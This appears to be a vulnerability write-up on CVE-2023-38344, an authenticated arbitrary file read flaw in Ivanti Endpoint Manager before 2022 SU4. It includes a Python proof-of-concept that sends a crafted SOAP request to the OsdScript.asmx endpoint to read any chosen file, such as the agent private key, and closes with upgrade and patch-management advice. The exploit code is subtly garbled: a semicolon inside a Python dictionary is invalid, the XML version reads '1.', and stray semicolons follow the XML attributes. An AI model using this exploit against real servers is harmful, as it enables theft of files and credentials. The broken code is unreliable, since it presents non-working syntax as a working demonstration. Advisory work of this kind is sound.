A recently discovered vulnerability (CVE-2023-38344) affects Ivanti Endpoint Manager versions before 2022 SU4. This vulnerability allows authenticated attackers to read arbitrary files from a remote system by exploiting a file disclosure flaw in the GetFileContents SOAP (Simple Object Access Protocol) action exposed via the /landesk/managementsuite/core/core.secure/OsdScript.asmx endpoint. One of the most critical aspects of this vulnerability is that it enables an attacker to access the private key used to authenticate remote access to agents, putting the entire system at risk.

Exploit Details

The vulnerability exists in the GetFileContents SOAP action, allowing authenticated attackers to access arbitrary files by not sufficiently restricting user-supplied paths. An attacker can exploit this flaw by sending a specially crafted request containing a malicious file path to the vulnerable endpoint.

Here's a sample code snippet demonstrating the exploitation

import requests

url = "https://TARGET_SERVER/landesk/managementsuite/core/core.secure/OsdScript.asmx";
headers = {
  "Content-Type": "text/xml; charset=utf-8",
  "SOAPAction": "http://tempuri.org/GetFileContents";
}

# Replace TARGET_FILE with the desired file you want to read
payload = """
<?xml version="1."?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
                 xmlns:xsd="http://www.w3.org/2001/XMLSchema";
                 xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">;
  <soap12:Body>
    <GetFileContents xmlns="http://tempuri.org/">;
      <session>SAMPLE_SESSION_ID</session>
      <file>TARGET_FILE</file>
    </GetFileContents>
  </soap12:Body>
</soap12:Envelope>
""".strip()

response = requests.post(url, data=payload, headers=headers)
print(response.text)

Important References

1. Ivanti Security Advisory
2. CVE-2023-38344 NVD Page

Mitigation

To mitigate this vulnerability, it is highly recommended to upgrade Ivanti Endpoint Manager to version 2022 SU4 or later. The latest version has addressed the file disclosure vulnerability by properly restricting user-supplied paths.

Furthermore, organizations should consider implementing the principle of least privilege by limiting user access to critical files and monitoring any attempts to access sensitive information stored on remote systems.

Finally, consider implementing a comprehensive patch management policy to ensure software is up-to-date and protected against known vulnerabilities. This can help reduce the risk of exploitation and minimize the potential impact of security issues.

Conclusion

CVE-2023-38344 is a severe vulnerability affecting Ivanti Endpoint Manager before 2022 SU4. By exploiting this vulnerability, an authenticated attacker can read arbitrary files from a remote system, including sensitive data like the private key used for authentication. Organizations must take this vulnerability seriously and apply the appropriate updates and security measures to protect their environments.

Timeline

Published on: 09/21/2023 21:15:00 UTC
Last modified on: 09/25/2023 17:04:00 UTC